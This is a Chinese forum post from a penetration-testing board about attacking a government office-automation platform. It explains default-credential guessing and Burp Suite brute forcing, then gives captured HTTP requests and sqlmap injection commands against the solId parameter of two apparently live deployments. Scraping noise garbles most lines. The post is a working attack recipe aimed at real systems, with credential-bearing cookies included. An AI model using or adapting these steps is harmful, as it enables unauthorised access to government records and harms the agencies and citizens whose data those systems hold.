5 c& f7 f5 Z; }& q8 v: P
$ d- _( |! T2 O( O1 f4 M5 a, Y 平台简介:5 a5 o, V; y, q# X+ F/ [& _
9 N$ |. r+ g: C, v; G2 o+ x
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
# l9 m$ r& ?% ~7 j' ^- ` 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:) s) |+ _# v+ T
9 h" n; E# f I) `! t, q! V9 \/ O( C9 P
, u7 Q( D6 o" t- G4 ` http://1.1.1.1:7197/cap-aco/#(案例2-)
0 X7 e2 p+ \- x0 N3 M http://www.XXOO.com (案例1-官网网站)5 R7 z- Z M! V2 r9 U
/ ?8 G$ ~4 D. N
5 |& W) A. r: L3 y& f+ s% J1 H8 z 漏洞详情:1 A3 o, F2 `& a
5 Z5 F; g! k1 j. I 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试5 ^ d* e. l0 q" F/ m% j
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
- N) c3 z2 B# z: Y
e9 ^8 z+ }( c: `+ D3 Z a" \ k* a
/ C; w" a) e: t; O5 A; i! G: t
, J: a# c5 O5 I6 d7 o) G3 r! Z status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
1 z& s! A* \2 r/ e: ~, q } U: K 1、案例1-官方网站9 w2 z: v. \ c. O9 |) D3 o
8 k5 u' z7 h& T$ M/ w2 ^. |+ G; i) w GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
3 N# w6 G( ^6 n5 X# ]) A Host: www.XXOO.com6 z. [) d9 ?, H
! R6 F) q2 F2 f/ J: q: o Proxy-Connection: Keep-Alive
1 D% @- ^+ R0 x Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN' w/ V$ q3 K0 [+ s1 {* D9 q1 u
/ Q! Q2 Y* c+ I4 L \ Content-Type: application/json
n% O' I) F% G# f$ [. E* `/ a6 a3 X# t, @8 ?2 Z) s User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko; z+ q' j' W% ~$ }3 F% h
3 n/ Z* A5 r+ {8 j$ u; { X-Requested-With: XMLHttpRequest
5 d! D1 i( n% c* `" uhttp://www.XXOO.com/bizRunContro ... 80?modCode=1008M0028 k4 r& W( a# }7 A S+ h# |( F
Referer:7 H A y$ z2 g: N Accept-Encoding: gzip, deflate, sdch
# f5 {: _. ^# H7 s! n Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e% @; t; W/ d# }- r- p. v% H2 R H$ b
3 x1 |0 w5 v7 x6 D' k 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
0 l; F9 L t! \! B L
+ [- O5 F# {* E4 _! \! s0 n2 X+ }
2 o5 E7 T5 f/ e, ]
/ [( |% _3 @9 ~, E% f0 i8 }9 d
1 }- v* @) J( g! K2 p' p* G: w# E5 ^ R& z p 1 k/ z. X$ u1 [& X8 W& m
2 s G1 x; V: I M( y0 M D6 L: }" ~
G* P6 l; B4 y1 a4 Q 2、案例2-某天河云平台
/ Z2 x9 P: ~0 ` z# Y% X GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
9 P7 N5 f- \* c1 \9 e, K1 n7 l* b8 x( Z Host: 1.1.1.:7197
Accept: application/json, text/javascript, */*; q=0.01
5 `3 ^( `6 ^3 k* ^ B( c8 z4 v X-Requested-With: XMLHttpRequest
- }# f U: E: i/ Y' L8 l T9 |8 V, b! O8 h User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
) X/ S4 Q0 N8 I4 }9 }. @ Content-Type: application/json1 p' h. u1 b/ `7 E. K) n4 b
! W% P6 u* ~1 [$ Z" j: p2 F8 ?6 W$ N6 W% [5 {4 x Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
Accept-Language: zh-CN,zh;q=0.8
( m# f% T y7 c+ b: z7 J Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
2 ^+ a- l6 a* ^" B# p. [: u; R _0 ], L& ] Connection: close' a- j' r# s- \! e: i8 g/ q
1 X' K# S5 D/ e3 g$ ?. A% D( P; h' }4 t 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:: l. X: ?7 r+ ^
/ V6 e3 q! M, |4 D& N* k% M8 ~/ ~- g) a( W+ T1 D7 _0 ^
3 G# d' o3 J& C3 S# L/ i
+ r* h" D1 B; L4 Y! n* c* `
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |